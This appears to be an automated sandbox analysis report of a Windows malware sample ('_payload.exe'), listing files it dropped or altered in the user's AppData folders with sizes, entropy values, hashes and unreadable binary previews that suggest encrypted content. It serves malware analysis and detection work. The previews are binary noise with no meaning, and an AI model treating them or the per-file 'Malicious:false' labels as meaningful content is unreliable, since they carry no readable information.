                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):237946
                                                                                                      Entropy (8bit):7.235528966334728
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:3l7eF97HHReHOnZj6H0N1byAmMZGqocOq2I1wdv1XxNebPCmukIO2Nppdj+cdUAC:ORHH7YH0Npq6av1XxNerZQOa/dKF2AR
                                                                                                      MD5:35112EEC5C9A7344D82AF959EB35740C
                                                                                                      SHA1:06BEC8442205CDD3693CCDC69A192FBE2A6445B7
                                                                                                      SHA-256:AA3E58FD46A83C528F9B8B64FBAD736099547E96A0766276224264CB0B6DE93F
                                                                                                      SHA-512:9490EB2C0C90B43B0BF81A07F1C78A36A35E9BEA2B535EE7F83A03BDFDAB298FBD4F91536C6E6EB1B0C634462095A762BBDA1B124F551558172164A0FFEA028C
                                                                                                      Malicious:false
                                                                                                      Preview:.....d...y.E...i.. .x...U.....8...E....Q...0u`........`xo..?.....1.YEG....$....Nr8t......7....r.....p..P......T`g.$:..).,....3.......K..<....%...2...|l.I._..,..%..qH.1?.tq.JH.........0...tJF..3..-..=.n..L....F..<_B.D..6.9......J.h..T..Z......JW...y9...p.l.......K....m....,]k.1h.U.G...P..J.`.a;........hR..a..UPB...f.$..:..=.Rbv%..zp...?..L..m....:........{.v.8....)M....weN..;A....?....N.........xm.}.9..E.[...."......z_]l..y-...&..>...Y.!.H.....|C...)\....H]..<s.y..z.|..w23H..f.Z^..Z.m../.6G..._.S.....v....X|V[....N....gl..7e..B|..3.....n.....87..#._r..r...GB..>......R.......gO.-...o/.56.....;.O|k...l...a.......P7~.h.r.ig.~.9H....\4...+.cmX.E.@.UP.},....((.#.\..M...........n...#......R.8.........Z...4...Y....|..R...Y..2P.G)..)F....D..Ai...).....011}k..W$.iHV....tb.y.2. .._..%..........H!....j...I.f....V.+.]..P.....X(........../U..&o.,.....n...NY.)U.......@.FH.bt.Zx.5.2...........`SX..xv.....3...!...I.....a..nT./..9S.3.k..........w

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):240470
                                                                                                      Entropy (8bit):7.2651376753788215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:pZsv+Osvt4pfxIKL42EbI96fiO/vw1DB5p:Xsv+epZh2Y8iOcl
                                                                                                      MD5:E97028AA8E1ADFDE120416BE20B83F25
                                                                                                      SHA1:F226BDDCDCD4C272815CC538AE929DDD303EC1E8
                                                                                                      SHA-256:1CDA24F69BC1C79B14014F01260220445C6AE8B2C15C8535125A635E1939F7CA
                                                                                                      SHA-512:E67B51C9EB754215B7B17BCF8E3EAE0E0700F98173701BCA48DD28AEE4E1157C100E0CD164FBB5C5344B8E36F9079DC91F4CEE46EF6A9F45909055DD3204E5B4
                                                                                                      Malicious:false
                                                                                                      Preview:.......1..C.....@Y..}.Jg.&?.'`E....1.....Z...)c...3.yZ..Z..Z"..X.Y..04.5.7..@N.>.;...A...'..&..RA.[......^./.N.......a5:L..'2.\....}.#6.Hzn.IMle..4...R.[9...E_M.Q:...1S.p...g$........G.KVDS>...al......jG.v..<..D.D]l.mR#5..Y..+1..._.}. ..)P0..RD...M...t,I.q$...$~...5.x./y.9>.RMF.8.2~.8).`.T....'{...QP.F..W)x..t...t9yZ!d.F..@...R..w...|n^../...8.6...<v...3...$<.o.N......RkyC......0..:d6..\...Ag..e..key.{F....(...H'..-...O7e.Eu. ......u...N..5Z.!l.:=....S.c. '.!y..+..v.2."..d.o......s9...{?E%....:.].a........@..d..i4^.........<...<....m.{..0#...,Z.hI..Is.?..?.c./.S.w... v.|f...V.~.-.......I..m.).....).] ..~. . Gn.6..F..p...K.R.....>...0...QH....0Y/0.Z..yi.<!.Te.=..\.^.....Og.}..H[.W.P...+.kXz...4;..W....G..*b......g.E...>..]........SgUW..".......S..._c.........;WV..h9+f.Z.pW.L=[>..V#....G....x..{..`J..J....tI...Y.QMfU.}.t.|...~...{..a..6s...K..d.jjU..K}.D..aw..0.Qh.VP.%.|...6.E....U.)........6..Y.0/.......39..W.2M.X......W.+1.<.&...<..<....4...c.6y

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.chk

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.980229524822179
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:svi0nwizjN1HEjgaqXR2oO3x7tM1UBmFLn+A27Op:sviQXHEjxqh4xq1QCqADp
                                                                                                      MD5:E4844076B524CE40643016BE9C4E79B8
                                                                                                      SHA1:04FF8DDC178B29BD6095E248B8D77BE1FE330BB4
                                                                                                      SHA-256:10D56051E63AD44B3CE4A9BCF3479C79A55B892252AD7DC67346EAE3E5A42078
                                                                                                      SHA-512:5C94FC9397BB5BC80B425A740F2EA5C5B79EA38290A0AEDB8F0D777E7B30DEDBF808C949AB65AEF8C51AE65BD36EF02676473959EF68405FD2EB6587F9C8E54C
                                                                                                      Malicious:false
                                                                                                      Preview:A......a......\Q.."..V. {.UHj$.~..2\T..$(7.y.xm..H...q.UHxW.sWNL..1E.yL.P kn.....;.8u*.Uo..C/.Q.....e...+.J.....4...[..q.x.W..w.h..N:.......`."........c.\*..Bw...T.........MjZ..C.].e&3..h....}fmW.'...@..A....b.>`q....G0..}j=6...t..q.. ;..1..9...@.?..u"$v.0t...Z...5{...U_x..#.0(*b.i.x.W.8....L.......J..V..[.E..0....b.....Dys`n....4.H.....8..U.o5l..{.f.=.Y@].... ...;..q_..`.3.j...?n.u.^.......~T....!...&..$.......Dq..tXj..c~.K.hXT.....*..+N@m...`..:,E..[.......d(.N.......A.H.6..cu.@.t}v.*)8HKN\P...G.....O.....>.j#....6...D.jk6.....0.B.a..oV.\l.6..$P+E..w.....<..........@..mY.n.w.?.U..=...J..Q.S0+..Ga....pl.N=8~T3.6K.iO.a..?...|3K.Y......4....)......=m...kQi.zJw...../7`...f<........."...5.-0....9j.rJ;...D...#A6.@..[#.*.Y.{.L....Z..=.1H.x.4....`}.Y...!>.....e8...+EJ.....!...Y...y.@4....oJh......w...L..zU..D..S.7RZ.;..o5.....2..M...;...x....c..8)D.Zx..T2.:.ej..4...X.........b4....m.-....n..2.m.S..S...G...c...B....ZZ... .G.l....u.s.M:..N.0

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):4.009773086414051
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:kFTZ1ub6uPp12mFiJtYYWwOioEySlMSUIB2TT4JOH/kS9aFqM4lHJQz2Mi0As9lj:kFyXP/rDCvpv9hYQz2X/skCh/Bj
                                                                                                      MD5:120B3928710E37F7B866480DCA3CA2E6
                                                                                                      SHA1:C7EBD669F2CA36AB49C501BE74A77D2B041D0978
                                                                                                      SHA-256:EBE782591B644F6B6ABBDB3D9D107D06D919C5366844B9A51F47E4FCC94520D7
                                                                                                      SHA-512:3A324DB17A10C7DEE00E05852452EC046CA46DE3A910EA8D315BB0CB1FF916DC2CDD5BC8F70FF6F720F3C27B95E2DFB56F0517234A3ECCB6522D6CAAB5F665CD
                                                                                                      Malicious:false
                                                                                                      Preview:....:..kV3..@u0P..wW|..H3wIy...t.b<&..;....1...S.K..V.O..q.RxBn.*.b..}.5...w.o.."~..~.|.`...T.D.....H..]r..0A0..iSQZ....nm.....L1l....m...zx........B."U. .k....j..V3*6......JX..w.c..bBj..C^..P_....n..up.(e4...U. ..)......1i*rH..j.geS..z..xN...@....q......j....F"2. .!...M.;...gw..E./..Q..q..O.E.3M....#HO..x.b.....O2...-Ud.]...1z.DBZ.]4.I!..S.....J..J..z.......o.v...N...}K|.....]'...1>C.S(y..qJ...`.,C.._M~.....b#G..K...."D.:&[.kn"..~.P..A(.5..A..*.w....{..G.#.......!.C.~.../.C......r.1.0L....:..2s...b.:..n7.%.L.......r...N...{.+?......b.\Z"(.D..;6<l.ab......r.l@7.. ;.".+....V.....z..B..._..%.%.....l..@...@.S..?B.....^...J.../.1...=:.F....{[..<..~N.|4..............@M...u...N3.e.D.w.YE...?.0......c.........nn..]..#.>.....0..j.=&.zA%.Q.....0..1. ..$...L..WJ+..^....T........K..K..b.d..q5.+L.0..>{..%R9..A.Y........t2.N..m..\.....^...........i[.....t.3..9]e.a...?..u...2...L.v.s.W:...S%.E.d.P..4s ~...ted.R....zK'9Z.l.....z.Q...2...-..[..6

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2066304206642124
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:z/W6PXPa8cyUJ48/Jc43he0pHMM+UqXpz79SSyMCH8OEziWZ:rD2PJ48BcihpsDXpz4VC9
                                                                                                      MD5:CC960944396AEA4CC60DB3AE9B5C5009
                                                                                                      SHA1:89287B7EA97515D9871AB5B26198BD4B5E73897F
                                                                                                      SHA-256:4CEF89DB5A6E199A99120B0097627D5BE6D104A1047FBB8CACF40B65C87132BF
                                                                                                      SHA-512:8E80FDFADBA5C064CD5202E25E10370EA773E433E1797F584E72881A51AF9C73969FB92B49F70DEAAE8ABB53473F9BD1EA50C0776AA576AC343404F61F710252
                                                                                                      Malicious:false
                                                                                                      Preview:......W............1...j1^.{-XE.c.a.!.-Yn.............."..H{.........W...9F.......w..I\. ....&>.G.....S...^..r.(...[..2..?g..ou..O...N.&yY...*.m.M.<.........R.P3#....y...]V.-..P... ...:...m.O[.X..A.G1..?...........T2.@...w.H`o..d.Rh.^t(.Yg..".0..n..4.....:.yk/,..)GuPx_8..X-..e.:...h.....n..y.<...e.K&.a.*....l".M..s..s(w.. ....~Lxlom....Zaq:R7..,b.iv...G}.L...u`z.Ji...V6=.......}n.'..Q..?b;.*?.S..i...9*...z.....6.=\M.?. ...$j.k.....:...}...@rGj..pG....#...\.#......M2.n..`.L...Q.5..u-.q....~3.r..) >...c8_y.x.lz.?.(.).6.uz)1V_.......j...FU.....qN.@....r6.Ixy...t.(..a......n5m31.@X..t........T...>!C..2.$..ho...../....n...p."h.h.%R.,....<8....y..qJ...........Xh...`....PHPv..\kc....n.|.KT.....;.{.H:....`.o'..l.l...%1..kD......^.W........q:L.R.V..]....6.?.kn.....N..s.n;...K8TX.."........2..&....!.%.).~..)f.c...B..E3......x...Oz9m.5RSB.W.D...+a:5pL3...|.....~0.]..zX......a."h.....W..".\....@..y....R`b.!.a~......f.....Dq.@...I.....h.......:Q~..c[.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2084784346438515
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:/7nUzDpBdzRlCfiUi/ql4scD8Wbnqx8vzeOlFi+DzS:/DEz2fiUgquD8W2rOG+y
                                                                                                      MD5:46DE8FB8B7C375990D64195D7344BED0
                                                                                                      SHA1:9A4BCC2DDD0033A58479567AB104D32E3FA5881A
                                                                                                      SHA-256:A96ED7C438917F7D2D7F70F412F1DD9925E4FC7FAD095C18AF8D81A20C72D18D
                                                                                                      SHA-512:2324CDCA0E7166D25716C82D0AD7E2552D5F3786536D77BC1592F1BA36EBDEDDC654C5B6EADD0A39FB20E498334C71A0C5C72B02B3C6CB7ADD81B51881AD457C
                                                                                                      Malicious:false
                                                                                                      Preview:..........cw.....r.-..h{...JR.~..0.V....:O..&..-.rY(.C.....)..?9.d..>m9K.3.......]ft.........+.].n.....o.K=.h..8.23....=...>....9c...u.e..3K.g..W0.....-..<#.c...3...b.uJ....8*P.+r!.!Z.s+.u..].S6.....@....q......-5..[P;=t....?N.~..wb...lq.H...`..6a..d.....w...T'.l....1....%....$#....>..L..HD..cHW.....v.+L|.M .n.......%r.....[V@;..O5...xXSX."..~....-..l]ZR.......S./H.....X..t..4.;-.*[.GVu8.>...h..e..F6..Y.W.tU.NRUo.Z5.K})...^..`6.e#..*kbW.'F.e......k...=e..5......M....|.Kz.."4."&..B......g~..*~b.^0...B[Ei.......i.^I....!.R..m\...M@....~...y.s8......U...[:..G....,.*k2.$.f...G5yv.6-r_...b..._H.......W.C(.r...T......=.IAai..yV..d.f.W...s..7..F.6..|..`...K./Z...%.J.I}"..~t..%..Lw.v..m..*3..iW.q.I.p.....&...b......Ex..$.U.y..Z.#.X...B..W...`..g..S.wT.5.P@.=..HROc.K.!...PZ.....k...0.}...........7.c....M......|]iX_y[.......e...;,:wRu..m.ao-zw......pnt.'.....#AS...._....."....,......)sn44....d*.y4q.I.....=.3I.@.H......6....k.1g.a.....I.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbtmp.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.208125813161908
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:ONbrM9SBDj8mRhlpmRKgepbY8ihq5E0OtmasBzE:yrM9SBDHLlQ4locOvsBw
                                                                                                      MD5:6477C901781CA814119963CEC3C8B17D
                                                                                                      SHA1:5FC86EA3A9DF32259AC79CA827D30541301037FE
                                                                                                      SHA-256:FCB70829B7B829009D98CF51A4884A014B21E239B360D06F085D7DD12753A458
                                                                                                      SHA-512:4AC2A967E4B3AAE5A7FAFED2B17D1B2D28AFE901165CB765DB8ECDB5DB9DE9A73F3557B70BA83C4A95097C620C5A69B96E6F7266ED429D4091F54DD9962B58D5
                                                                                                      Malicious:false
                                                                                                      Preview:.....dP....)b...3.Y\Q0...P?..........Y.......a..s....U.3n..z.*U.k.".!=..Y..cN...co..m..K]u.....Y..i%;..N.f.$......P......l*B..Q..%.......h..q.u.8Y....\..R.^1...6....&y..X...$...D.[.F..b]N..>."a.b>.L@.B.tyn...[G.A......3.jn...?.w2....4.G.c.J<e.a.g...fn.*8" .1.R...zg...n[.%=......P...0r.[.m.'. {...-....s....;..gJA4.9..{.....N.H<.......w8.......W.D./.i.*...&...`..A2Y;-fC..mF......'..'....r.u/.....1U.....Y.Q....f..f....n.|..P...d..(....Fh.._0..=....v.%.........R..v..U;A7.R.i8..L../f.%E.].2)..~.k.S.).M|Gg......s$..c....lY87.r./.g._..{r?.5'...sEygP..8..'.....t+....d.o..NRe....9....6MbkH.dG.c.......ca....Q?..0u. lB.m.F.....G.`.....S.CX.z..(.#L@..(.........q.+K(B.i...D...I..q3(<o...c..2....iRb._...*jP...3..!].M......Vm...'........%8'..h'.=...C...,.....l.%..].d.....>....&'...%w.H.}.]..d..'..Vv..u5..s........q.>..i....tv0}@..3.-..1..M.oJ...'.........+.i1.Lq..Z@~.......w.`..N.. U...q>.I..z..S.CW.....6..b....]F.....*ko.....@Z.c...Z.[0x....o.Nv......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3384
                                                                                                      Entropy (8bit):7.949107870001335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:zb4Kgy50/0aUeUl9V54LFO6yGJITLvAXA:zbbaCzl/GLpJITLvCA
                                                                                                      MD5:6DC417183FC61E521E09A21C8FF07169
                                                                                                      SHA1:EAAF83DB7485A97CD0B6E8F4A970E19478313F42
                                                                                                      SHA-256:11A8A075710B038DE76B535DE75BEA0A9CCAE32360E73E6ED904AA482BE1135C
                                                                                                      SHA-512:1646EB13ACC2B29E2394C0DE72D659351B0EB7D116F1B3132A52BEAB0E583B85A0CCF9308F2D36F66E16A6482396C50A39CAF8DE5060F40CB9A70DAFE21C3DDF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..P..-.Ne....E..8..1....N$........_s.pdt...k.....|.l........(.s}.n.A.]..8...R.q3>0.>.Q6..<.Z.....ix..>4y1-z^.....z.T..,:...#.k..O......A..%O...sY.....,.2.v@..].as...sA...A...P...>.e<.C..D..B..%......,..5-.6.N].......{.h."..4S.v.b....ak..n......%......+.c.......kW.....l..?...q.&...R.R...).h...O........~ND...)..p.>.3.x..v.....wZ.L..@W..../.c#..^.j...!.s./.{9..L.)[M..d......q...{aU..O.......F.....^(..A.S+n2..7~....J...^...D...bn.9K.....|.)l..0.`r.........7b...'.<VFF'.H._.(...e3V.oN..j&#5U/!-.U......V.'<.3..v.@uc..0?`x&..,.z.D.....UXg.?.y..M..#.......yie...kT."......i.:#...............d.e.J.......A.c.Y..[...~...&....>.X..1[-`,..$}.R....4."..Y<..*..m.p...[Ps.......<.....I.z.`........1...5...?.{......{U?.....K...E.c...w.W-..mv...._`pf0.{.....KM.4.N.^...u.Y.2.....\....{.e."..z..Hn...}.~.N.*.F...[..T....t.~o...q,.9.4O#e*3.......J9./..B'...............N....eW...O;Pg]/>...9OS...,...p.._.K.qv.`..f=1*}d^Cb._8X.(.....U..3........$...*.<...P,U.,-

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6906
                                                                                                      Entropy (8bit):7.972304445434806
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:KngnRocauFAfRbETxEkc4X39inilSsiATTF4qVI:KgnGcaIcRbEFlXonqSsiAXF4cI
                                                                                                      MD5:8BAB689DD778160A842E9CFD0FC6C3D2
                                                                                                      SHA1:3A2334695B8A1E525A792F88A94D5E6F9147E100
                                                                                                      SHA-256:6B733C40D049A76D0AF48538544576E4F175595D9355A578147989A176C39B86
                                                                                                      SHA-512:EE44357FD27F3B4401D7B6C3FEF5B4B561B53E2FA35886D4F38C402F882680779BD6ECBED9080BA0C3E1F23123B4AA3C35AD4CF75A7E23E8379E3F2FCCAF1FC4
                                                                                                      Malicious:false
                                                                                                      Preview:10/03......?....\..S._t.F....@*#b3..U.'...N.....j...5..g-.:k#.9...#IC>...B...o...a.... s....F..'.$).?....%.9..LU}R.Y.}..9U...F.."..m%....~..{(.....].78SGp.U...*......*19....M.B.....k.%..5..'w.Zx..A>n.....5.....)....t(..d;q.....wE....i ..2C#...$.J.....>R.Hd..5~..nH..G(|j.].w.;WC.\u.D4|.L..2]K.\..oG?...U...<....._1.._.~8d.@.W|.jX.....I..6*...x'.<N......t....+r|../...c.K}..,.G.1K2l.....O3#.%.p."R..N.+..j.]5Xz.U...t.1...5r..Z~*...).w.T>.......L.#..O.....]....F\.iY.6.~..r..{._...^Q.%.......!S....O.`;.....;....Z.....*#....(0{.:.[.......9....#.Xe....Z?..qHd'....2r[.."78 ms\-......+..._...5f.`...........f].L8M...%..z.J..xvF=.x....H.e]...T7..h...... .N.~.$\.\...........C. B.......8.o..J~.[..........!....nX....`.+Hs..+...c.).y)....?....a.....cN].....xu...a.....II.:.../"(.......z!F.6=|.o&..T.={n...a{..~...fdL914.jh.M....?.KqfI...."P....U..i.#.rX...t.m.d...%..a....a..dR9 ^.x...t.N.....,...O..@|.@uVn.*.>SbGN."...6SSD.......$.J...5../5Xl..W..o

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):834
                                                                                                      Entropy (8bit):7.738768422078147
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Qmj5+kUNOsuu15FIknlLi4Yuq57ta7aCv6bD:1jIOsu02vD/787aCwD
                                                                                                      MD5:5BF095B7F494BDCE3522E16D9B9BC40F
                                                                                                      SHA1:2160E805952BCD3A61640808E0363E8F490D7074
                                                                                                      SHA-256:E27703D21D055FB2297FEA466AA1C0B62F9917F9F000372D297F71E6A9745B7B
                                                                                                      SHA-512:FD72F206ECB2021E011DAB8530A277800DC488DABA4A244E5CBE80986CD6BDD0E5635B57505F8795646F9B97378333EF019F031F9E367B0DFFF7DD2A88AEA991
                                                                                                      Malicious:false
                                                                                                      Preview:..1.0f.F.Vp._..Q..Q.4.E.o...j.9y<...H.b.....vX..l.<....W..2.uB+...1H..)...^......^-$(..5...~.n......\.q..3c.S..]1.....\j..j.7b.[......M.He?mj.=...j.+....r...#A..4v^...=..R?..7.%,..<....N.0..``...q.&$..{.4.~..}..'.~X]..j.*6.Y.5...t....t...w.N.."..7......)...g.DU......o...B<t...Y...?..p......`....V..........f!.y;...B4&.r....wq...e..n.S@N...Zm...Xp%n..n-..A.D....W.O0....r.v.-Dq......7.......o..`....I.<K...@@....".lq.N..+..j-....<$.W.....H.hin.[.........m.u.`3y.(.d....Q..z.....Ig.R..RV2..m.^y.qR.......E}!..*.FX7&...b<[..@.i.q5..r........tS.a.......pz.......VIxr.k.R2.H.....Z....:8.....~....k.m9-m`'..... .b....nw.p...VQ......w....\.g....K9.....=QAx.+'..`,c.....V4..nq..7.#.=YN[.....)'r...T...........Q.9.#......fo/hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1740
                                                                                                      Entropy (8bit):7.869575411311135
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0h4NALhktvBWMtrNKH4IfDkZgFoEtlk277FhNwD:HuhktJjt8kcd+
                                                                                                      MD5:DE23D8774C696A8629EF8139314C00BD
                                                                                                      SHA1:239A7040FB7E1C7860F92554F84C87900E8F035A
                                                                                                      SHA-256:B2C90E9113FFA1FDDD69E1AE26A783AD64A3FE8CB440EB900527074F2F1FEDC6
                                                                                                      SHA-512:EA7131BAD732BC6A46A960F8EF2C26EA440FBA48A78B37BA132CFC9A7C69BDB49982FE0C2917FE4705E0E902EC3B9E336FE56E85C979B92F81BA23BB868D5BBB
                                                                                                      Malicious:false
                                                                                                      Preview:..1.0.p.dC..D....../....Z......}hr@bT...+.E\.;<L.H.]........V3Q.BV....7(.....~.....K..!.}U.Z?..{F.....K...n...{.A.. ..cp..9'.. .....[j....5..A%..Ob...zwEm...R9Y(.`{z.`.Y.3..O....@...[.a...b..w.M.k3.u%.O.]..S.17.3."!...,.../-.s........i.W...Z..n.A........^]..p...'.B..b..."..nr.;.\..4.......2V..w..2.......2.~2..ekdk..$.)....FX..9....>.....li8..%.`.2.M.........y....9......n.[{'..7}...~z.....&..`(.........(.....l.E...I. #...I.QF..K..}..q.........4Q.#..vU..l.L..:....&....RUn...(.}1...$..f...q.!@6.X.B..G.n...U1k1...y.\.B.g.u..U])...q..y.!.._};j=..T...&./A......Vn...AwU.{.%....t.`..L[P..f...!.o....F..pLM. _../k..../.}.8...,_0.q.[.\[.....<.q....<.#.1.^.H=Y...UZh......@..E.l6.v....ET.c.u.#/...Q..:....v..v%..D.7W.]./....u>........ 6..0.R.~..E.J. ><.....9.%B....~....ieI.....*?.F.1.d........C....-.n *6.4....U...^fQ....e/hU1......U..U.B.! ......y.#<0...bQN.-...t...d..~..<K.KE.l......B....zS.`dv.].L....=Z.Y.7.~..@.H..w.F.k..k.\E9u...m.R...7.3.D..._.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\01_Music_auto_rated_at_5_stars.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1378
                                                                                                      Entropy (8bit):7.8404684984646575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tdrwuawAf0zRHfa6mF4O3P94KdvyiGmswMcmxOUmiNUntBHv6bD:6wAMzdfaWYP+KdvyiGaMcmDmpttwD
                                                                                                      MD5:FE645A3E454A6543372D0382F4414FFB
                                                                                                      SHA1:9EEB9591006FFC8CF2954785FAF3844D0CDB4FA1
                                                                                                      SHA-256:89044888EBAF50AEE65B03E9035B954295AFA1E9EF4B01EC7E7944920CCBD101
                                                                                                      SHA-512:3446F9211E01D9781EBB154CBD228E33357F209F848A254E950B5C584212175BE4E8C7E1EFC149C03A086965E3A5B8359CCB45DF8E49C13172CE27B3193FD629
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl...#Qk..lB..g..f....@rG,.C....p..e.....'"..<....f....lpf.1PNq"..BpC`y.........r.f..5".r...H...5:...GVU....r@.hY....D.....r.c.E.U.H......$+.....i.....Ci...wti..(..f.e..X..B.K.)...h.;.a.....[.d.%..3.=.....Y....x..t..........r..-%.....FV..Q....1m.o..=n...e.ik...d<.#............K\.Js.b....,<...!..F....]..B.A...}v;.:..t....Y.......p.3*.."3O2.z.$.t.2.......8.6..URF5..TK...d.<)j...lrG........G..rC..]J.....e..8U.)H.,......`.......6w.o9..(]...uH+.].&......7...m.h.e**.....d..5....n.....6E..+......0...N..A{.#U^.m.X..k.:.(th...W.e..l.H...(.d...f.u*.N..'.....j.O>b.E...E.\.p.........%........Z...J. ....(.t.{I..y..C$..i.'.*....#>WA}.../,.B.[*%Vs.q.>.h.;..<.......[....k...c..,D..............lX.S....M.V3I.3..M.Q.o3.D.bH.......p....f..m!..^;-R....mK....Y.5\.&..zaZ.q .r2.\Q...<-........a.y...6.O....V.....Qo.....`Q.?.NB....Eg...z.p.....V.(Bi..$...;..[.C..b?.E.r...[...#w<.I.R..K.....iG.#..^....*.\.?d3E.:.$ .w..>"....B..B....B.q~...D..j.t.z.'q.1..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\02_Music_added_in_the_last_month.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1613
                                                                                                      Entropy (8bit):7.867995067516844
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:LWTfGZZ6I27sb2Yx6bMbnwwJVDKN+N7aL8qwD:iCZTcApQM7KN+NWYf
                                                                                                      MD5:009B67DB02FD8D510251A647EE14E1C4
                                                                                                      SHA1:468B926F8F0B08982975F4B785E77A6A5E91B26B
                                                                                                      SHA-256:0C58B3A8CD992A840E136CCFB3ECE623C599F993D2218A9CFCE74A294DD9B904
                                                                                                      SHA-512:C31BF8B4DE943CBD6E5400705AD4AB16D48C1DE85F39A1D7420BB0520EF8D3819F4C6CE449173A45705468FB7A2828532C175C59C149FA95837AB20FEC5D7A60
                                                                                                      Malicious:false
